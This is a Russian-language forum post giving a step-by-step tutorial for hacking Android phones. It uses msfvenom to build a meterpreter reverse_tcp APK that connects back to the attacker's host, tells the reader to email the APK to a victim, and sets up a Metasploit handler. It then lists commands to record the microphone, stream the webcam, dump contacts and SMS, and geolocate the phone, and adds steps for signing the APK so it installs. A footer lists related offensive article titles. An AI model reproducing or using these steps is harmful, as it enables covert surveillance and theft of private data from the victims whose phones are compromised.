Metasploit для будущих хакеров (msfvenom payload): Взломайте любой телефон на Android

Floda · 6 июн 2018

Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload.

Установка и использование msfvenom payload:
1. Запустите kali и откройте панель управления.

2. Установите payload и создайте всплывающее окно пользователя вот этой командой:

root@kali:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk

(Для того чтобы узнать свой LHOST, откройте новый терминал и введите ifconfig)

Файл apk сохранен в базовую папку.

Примечание: Нигде не добавляйте лишних символов и пробелов. Используйте команду в формате «как есть»( после изменения LHOST и LPORT как необходимо).
3. Передайте/ отправьте по e-mail этот файл (andro.apk) на телефон жертвы и запустите установку.

4. Запустите metasploit framework следующей командой

root@kali:-# msfconsole

5. Теперь пора открыть и установить мульти-драйвер. Выполните следующие операции:

msf > use multi/handler

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.0.110

msf exploit(handler) > set LPORT 4444

msf exploit(handler) > exploit

Запускается драйвер Payload……..

6. Когда жертва кликает на приложение ( установленное в меню телефона как основное действие ) запускается система удаленного управления.

7. Воспользуйтесь следующими командами просмотра:

record_mic

webcam_snap

webcam_stream

dump_contacts

dump_sms

geolocate

Что делать, если вылетает ошибка парсинга:

Error fixing(incase you get PARSE ERROR)

Для исправления этой ошибки загрузите signapk

После чего выполните следующие операции:

Откройте папку «Signapk» и запустите расширение «cmd».

Скопируйте «andro.apk» (созданное вами приложение) в папку Signapk.

Введите следующую команду java -» jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk «в cmd (без двойных кавычек)

Скопируйте на телефон и установите.

Молимся чтобы сработало…

Источник

5 Полезных способов юзать conntrack для анализа сетевого трафика.

Форк бомба на Linux.

Есть статьи по maltego?

Пробиваем людей по номеру

Гейминг на Linux: миф или реальность?

Подглядываем за чужой вебкой [Kali Linux]

Разведка для pentesta | принципы разведки | инструменты для разведки

****им RDP, SSH, VNC с помощью Crowbar

Как поиграть в игры на linux лёгкий способ

КАК ХАЦНУТЬ wi-fi?

Базовая информация по сетевому взаимодействию

Установка kali linux на android (termux)

Как установить Kali Linux на флешку с сохранением и без + переходом Gnub ? Мини-Гайд

Взлом ПК с помощью GIF

Взламываем сайты за 5 минут [ Kali Linux ]

Взлом любого телефона Android за пару минут

Создание бэкдора HTTP-сервера Apache

Базовая эскалация привелегий (PrivEsc)

Браузер в консоли Linux

Среда Kali Nethunter в Termux (Перезалив)

[ Kali Linux ] Роняем сайты c помощью "Xerses"

Площадки по пентесту в 2024 году

Взлом Андроид телефона

Взлом Android с помощью Kali (Удаленно)

Решение проблемы подключения ардуино к Ubuntu

Быстрый анализатор ссылок PIDRILA (лучше чем Dirb)

Memcrashed ddos termux

Инструкция по использованию Wifite

Инструменты Kali Linux: мощь тестирования и безопасности (Новичкам)

Установка Python нужной версии на Kali Linux

Metasploit для будущих хакеров (msfvenom payload): Взломайте любой телефон на Android